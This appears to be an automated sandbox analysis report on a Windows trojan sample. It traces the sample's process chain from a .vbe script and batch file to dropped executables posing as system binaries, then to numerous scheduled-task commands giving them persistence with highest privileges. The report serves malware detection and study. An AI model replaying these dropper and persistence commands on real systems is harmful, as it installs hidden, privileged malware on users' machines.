                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BDA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00BDA69B
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00BEC220
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: bridgeServerFontSavesMonitor.exe, 00000004.00000002.1849804431.000000000393F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BD6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00BD6FAA
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exeJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\b1829d2998bf98Jump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\SchCache\RuntimeBroker.exeJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\SchCache\9e8d7a4ca61bd9Jump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exeJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Windows\Migration\WTR\b1829d2998bf98Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMPJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMPJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BD848E0_2_00BD848E
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BE00B70_2_00BE00B7
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BE40880_2_00BE4088
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BD40FE0_2_00BD40FE
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BF51C90_2_00BF51C9
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BE71530_2_00BE7153
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BD32F70_2_00BD32F7
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BE62CA0_2_00BE62CA
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BE43BF0_2_00BE43BF
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BDC4260_2_00BDC426
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BDF4610_2_00BDF461
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BFD4400_2_00BFD440
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BE77EF0_2_00BE77EF
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BFD8EE0_2_00BFD8EE
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BD286B0_2_00BD286B
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BDE9B70_2_00BDE9B7
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00C019F40_2_00C019F4
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BE6CDC0_2_00BE6CDC
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BE3E0B0_2_00BE3E0B
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BF4F9A0_2_00BF4F9A
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BDEFE20_2_00BDEFE2
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 4_2_00007FFD9BAD0D484_2_00007FFD9BAD0D48
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 4_2_00007FFD9BAD0E434_2_00007FFD9BAD0E43
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 29_2_00007FFD9BAB0D4829_2_00007FFD9BAB0D48
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 29_2_00007FFD9BAB0E4329_2_00007FFD9BAB0E43
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 32_2_00007FFD9BAA0D4832_2_00007FFD9BAA0D48
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 32_2_00007FFD9BAA0E4332_2_00007FFD9BAA0E43
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 35_2_00007FFD9BAD144135_2_00007FFD9BAD1441
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 35_2_00007FFD9BADC70535_2_00007FFD9BADC705
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 35_2_00007FFD9BAD147535_2_00007FFD9BAD1475
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 35_2_00007FFD9BAA0D4835_2_00007FFD9BAA0D48
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 35_2_00007FFD9BAA0E4335_2_00007FFD9BAA0E43
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAC0D4836_2_00007FFD9BAC0D48
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAC0E4336_2_00007FFD9BAC0E43
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAC117136_2_00007FFD9BAC1171
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAF144136_2_00007FFD9BAF1441
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAFC70536_2_00007FFD9BAFC705
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 36_2_00007FFD9BAF147536_2_00007FFD9BAF1475
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAC0D4838_2_00007FFD9BAC0D48
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAC0E4338_2_00007FFD9BAC0E43
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAF144138_2_00007FFD9BAF1441
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAFC70538_2_00007FFD9BAFC705
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 38_2_00007FFD9BAF147538_2_00007FFD9BAF1475
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 41_2_00007FFD9BAB0D4841_2_00007FFD9BAB0D48
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 41_2_00007FFD9BAB0E4341_2_00007FFD9BAB0E43
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 41_2_00007FFD9BAE144141_2_00007FFD9BAE1441
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 41_2_00007FFD9BAEC70541_2_00007FFD9BAEC705
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 41_2_00007FFD9BAE147541_2_00007FFD9BAE1475
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 43_2_00007FFD9BAA0D4843_2_00007FFD9BAA0D48
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 43_2_00007FFD9BAA0E4343_2_00007FFD9BAA0E43
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 43_2_00007FFD9BAD144143_2_00007FFD9BAD1441
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 43_2_00007FFD9BADC70543_2_00007FFD9BADC705
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeCode function: 43_2_00007FFD9BAD147543_2_00007FFD9BAD1475
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 44_2_00007FFD9BAA0D4844_2_00007FFD9BAA0D48
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 44_2_00007FFD9BAA0E4344_2_00007FFD9BAA0E43
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 44_2_00007FFD9BAD144144_2_00007FFD9BAD1441
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 44_2_00007FFD9BADC70544_2_00007FFD9BADC705
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeCode function: 44_2_00007FFD9BAD147544_2_00007FFD9BAD1475
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ARUSTYfT.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: String function: 00BEEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: String function: 00BEF5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: String function: 00BEEB78 appears 39 times
                                    Source: VObntHLa.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: ARUSTYfT.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: riACjval.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: hzhmzTUD.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: 7aHY4r6vXR.exe, 00000000.00000003.1740412950.000000000365A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 7aHY4r6vXR.exe
                                    Source: 7aHY4r6vXR.exe, 00000000.00000003.1740412950.000000000365A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs 7aHY4r6vXR.exe
                                    Source: 7aHY4r6vXR.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 7aHY4r6vXR.exe
                                    Source: 7aHY4r6vXR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: bridgeServerFontSavesMonitor.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe0.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: RuntimeBroker.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe1.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe2.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@45/29@0/0
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BD6C74 GetLastError,FormatMessageW,0_2_00BD6C74
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00BEA6C2
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\user\Desktop\VObntHLa.logJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-ir7LGSrsk71YAT4WpA4X
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile created: C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat" "
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCommand line argument: sfxname0_2_00BEDF1E
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCommand line argument: sfxstime0_2_00BEDF1E
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCommand line argument: STARTDLG0_2_00BEDF1E
                                    Source: 7aHY4r6vXR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 7aHY4r6vXR.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: 7aHY4r6vXR.exeVirustotal: Detection: 48%
                                    Source: 7aHY4r6vXR.exeReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeFile read: C:\Users\user\Desktop\7aHY4r6vXR.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\7aHY4r6vXR.exe "C:\Users\user\Desktop\7aHY4r6vXR.exe"
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe "C:\ChainBroker/bridgeServerFontSavesMonitor.exe"
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES69DB.tmp" "c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP"
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 7 /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 9 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 7 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknownProcess created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                    Source: unknownProcess created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                    Source: unknownProcess created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                    Source: unknownProcess created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                    Source: unknownProcess created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe" Jump to behavior
